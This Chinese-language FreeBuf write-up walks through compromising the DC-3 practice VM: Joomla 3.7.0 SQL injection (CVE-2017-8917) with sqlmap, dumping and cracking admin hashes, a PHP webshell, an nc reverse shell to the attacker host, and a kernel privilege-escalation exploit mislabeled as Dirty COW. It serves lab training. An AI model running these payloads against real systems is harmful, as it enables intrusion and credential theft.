官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
开冲- 关注
靶机信息
kali:192.168.123.73
靶机:192.168.123.144
信息收集
nmap收集信息
<a href="https://imgtg.com/image/b3KYX"><img src="https://i.imgtg.com/2022/03/31/b3KYX.png" alt="b3KYX.png" border="0"></a>
收集到80端口
访问80端口
<a href="https://imgtg.com/image/b3v5t"><img src="https://i.imgtg.com/2022/03/31/b3v5t.png" alt="b3v5t.png" border="0"></a>
wappalyzer显示的管理系统为Joomla
Joomla检测器
根据DC2,Joomla也应该存在检测器
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl
显示该页面表示joom下载正确
<a href="https://imgtg.com/image/b3yKx"><img src="https://i.imgtg.com/2022/03/31/b3yKx.png" alt="b3yKx.png" border="0"></a>
使用joomscan扫描DC3网站,返回信息
目录遍历
<a href="https://imgtg.com/image/b3gSj"><img src="https://i.imgtg.com/2022/03/31/b3gSj.png" alt="b3gSj.png" border="0"></a>
管理员后台
<a href="https://imgtg.com/image/b3mwp"><img src="https://i.imgtg.com/2022/03/31/b3mwp.png" alt="b3mwp.png" border="0"></a>
Joomla版本信息
<a href="https://imgtg.com/image/b3J1U"><img src="https://i.imgtg.com/2022/03/31/b3J1U.png" alt="b3J1U.png" border="0"></a>
渗透过程
SQL注入漏洞
百度搜到joomla的3.7.0的SQL漏洞(CVE-2017-8917)
Payload:http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
通过searchsploit joomla 3.7.0
<a href="https://imgtg.com/image/b3PDY"><img src="https://i.imgtg.com/2022/03/31/b3PDY.png" alt="b3PDY.png" border="0"></a>
查看对应的漏洞信息
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
<a href="https://imgtg.com/image/b3R8v"><img src="https://i.imgtg.com/2022/03/31/b3R8v.png" alt="b3R8v.png" border="0"></a>
爆库: sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
<a href="https://imgtg.com/image/b34xq"><img src="https://i.imgtg.com/2022/03/31/b34xq.png" alt="b34xq.png" border="0"></a>
存在information_schema、joomladb、mysql等等库。
盲注、报错注入、延时注入
爆表: sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering]
<a href="https://imgtg.com/image/b3Dpc"><img src="https://i.imgtg.com/2022/03/31/b3Dpc.png" alt="b3Dpc.png" border="0"></a>
<a href="https://imgtg.com/image/b3Hfr"><img src="https://i.imgtg.com/2022/03/31/b3Hfr.png" alt="b3Hfr.png" border="0"></a>
爆字段
<a href="https://imgtg.com/image/b3EBM"><img src="https://i.imgtg.com/2022/03/31/b3EBM.png" alt="b3EBM.png" border="0"></a>
尝试获取字段username和password的内容
sqlmap -u "http://192.168.123.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' -dump -p list[fullordering]
<a href="https://imgtg.com/image/b3GKG"><img src="https://i.imgtg.com/2022/03/31/b3GKG.png" alt="b3GKG.png" border="0"></a>
john工具(密码解密)
这里将加密的密码保存为一个文本
john命令参数
--single single crack 模式,使用配置文件中的规则进行破
--wordlist=FILE--stdin 字典模式,从 FILE 或标准输入中读取词汇
--show 显示已破解口令
<a href="https://imgtg.com/image/b3Q01"><img src="https://i.imgtg.com/2022/03/31/b3Q01.png" alt="b3Q01.png" border="0"></a>
<a href="https://imgtg.com/image/b3SwI"><img src="https://i.imgtg.com/2022/03/31/b3SwI.png" alt="b3SwI.png" border="0"></a>
Webshell上传
网站的template栏中发现可以写文件和上传文件,且目录遍历那块可以查看。尝试写一句话上去。
<a href="https://imgtg.com/image/b3c1D"><img src="https://i.imgtg.com/2022/03/31/b3c1D.png" alt="b3c1D.png" border="0"></a>
<a href="https://imgtg.com/image/b3dHF"><img src="https://i.imgtg.com/2022/03/31/b3dHF.png" alt="b3dHF.png" border="0"></a>
在New File一个新文件在html里面
<a href="https://imgtg.com/image/b3s86"><img src="https://i.imgtg.com/2022/03/31/b3s86.png" alt="b3s86.png" border="0"></a>
写入文件,之前在目录遍历里面查看chen.php
<a href="https://imgtg.com/image/b3YxP"><img src="https://i.imgtg.com/2022/03/31/b3YxP.png" alt="b3YxP.png" border="0"></a>
蚁剑连接
<a href="https://imgtg.com/image/b3fJb"><img src="https://i.imgtg.com/2022/03/31/b3fJb.png" alt="b3fJb.png" border="0"></a>
方便使用,在攻击机上监听端口,蚁剑反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.123.73 8888 >/tmp/f
<a href="https://imgtg.com/image/b3lfl"><img src="https://i.imgtg.com/2022/03/31/b3lfl.png" alt="b3lfl.png" border="0"></a>
脏牛提权
文件不能用了,把原理和步骤了解一遍
危害:低权限的用户利用漏洞在本地进行提权
原理:Linux内核的子系统在处理写入时复制至产生了竞争条件, 恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。
竞争条件:任务条件异常,导致应用崩溃,攻击者执行命令,在目标机器提权。
内核提权,通过查找服务器漏洞得到exp文件,运行提权文件
确定服务器版本
<a href="https://imgtg.com/image/b3jBg"><img src="https://i.imgtg.com/2022/03/31/b3jBg.png" alt="b3jBg.png" border="0"></a>
Ubuntu版本为16.04
searchsploit ubuntu 16.04
<a href="https://imgtg.com/image/b32ZB"><img src="https://i.imgtg.com/2022/03/31/b32ZB.png" alt="b32ZB.png" border="0"></a>
<a href="https://imgtg.com/image/b360s"><img src="https://i.imgtg.com/2022/03/31/b360s.png" alt="b360s.png" border="0"></a>
tar -xvf exploit.tar#解压文件
cd ebpf_mapfd_doubleput_exploit/ #进入目录
chmod +x compile.sh #授权
./compile.sh#执行脚本
./doubleput #执行提权脚本
等待root权限shell
总结
脏牛提权和不同方法反弹shell
<a href="https://imgtg.com/image/b3XMK"><img src="https://i.imgtg.com/2022/03/31/b3XMK.png" alt="b3XMK.png" border="0"></a>
链接
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
靶场
- 18 文章数
- 17 关注者